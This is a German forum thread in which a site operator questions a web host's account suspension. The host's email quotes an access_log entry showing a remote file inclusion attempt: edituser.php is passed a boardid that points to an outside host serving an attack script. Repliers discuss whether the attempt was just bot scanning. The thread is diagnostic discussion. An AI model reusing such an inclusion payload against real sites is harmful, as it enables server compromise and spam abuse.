Jump to content
powie.de Tech Forum
Sign in to follow this  
Powie

Merkwürdiges Security Issue

Recommended Posts

Ich möchte gern einmal eure Meinung hören zu dem folgenden Vorfall. Einer unserer Anwender hat eine Account Sperre seines Webspace hinnehmen müssen weil angeblich tausende Spam Mails verschickt wurden. Dazu gab es diese EMail des Webhosters, die ich beim ersten Lesen für vollkommenen Sinnlos halte:



In den access_log Ihres Accounts wurden folgende Einträge gefunden:


- - [05/Jul/2010:00:07:52 +0200] "GET /forum_d/edituser.php?boardid=http://amyru.h18.ru/images/cs.txt?

HTTP/1.1" 200 24187 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"



Folgende Skripte/Ordner wurden von uns per Chmod 000 gesperrt:


/tmp/.ICE


Bitte schalten Sie diese Skripte nicht einfach wieder frei, sondern prüfen mit

den Entwicklern, wie es zu diesen Sicherheitslücken innerhalb des Skriptes

kommen konnte. Ggf. verwenden Sie hier auch veralte Versionen mit bekannten

Sicherheitslücken.



Dazu habe ich zwei Argumente:

1. Ein solcher Angriff auf die edituser.php führt zu nichts, da dort die boardid sowieso nicht verabreitet wird.

2. Die Datei /tmp/.ICE hat mit dem Webuser garnichts zu tun, die gehört im Original zum X System.....

3. Vergleichbare Anfragen finden sich in allen access_logs, auch in meinen eigenen, das sind Bots die das Internet scannen und versuchen Einbruchsstellen ausfindig zu machen.

Share this post


Link to post
Share on other sites

Ich habe mittlerweile das access_log aus dem Zeitraum im Zugriff. Die genannte Zeile aus dem access_log kommt genau einmal vor..... (!)

Share this post


Link to post
Share on other sites

Gemerkt hab ich davon noch nichts, also bei mir wierden keine Mails versendet, das einzige was ich habe ist, das ich persönlich zig Spammails bekomme.

Share this post


Link to post
Share on other sites
Guest
You are commenting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×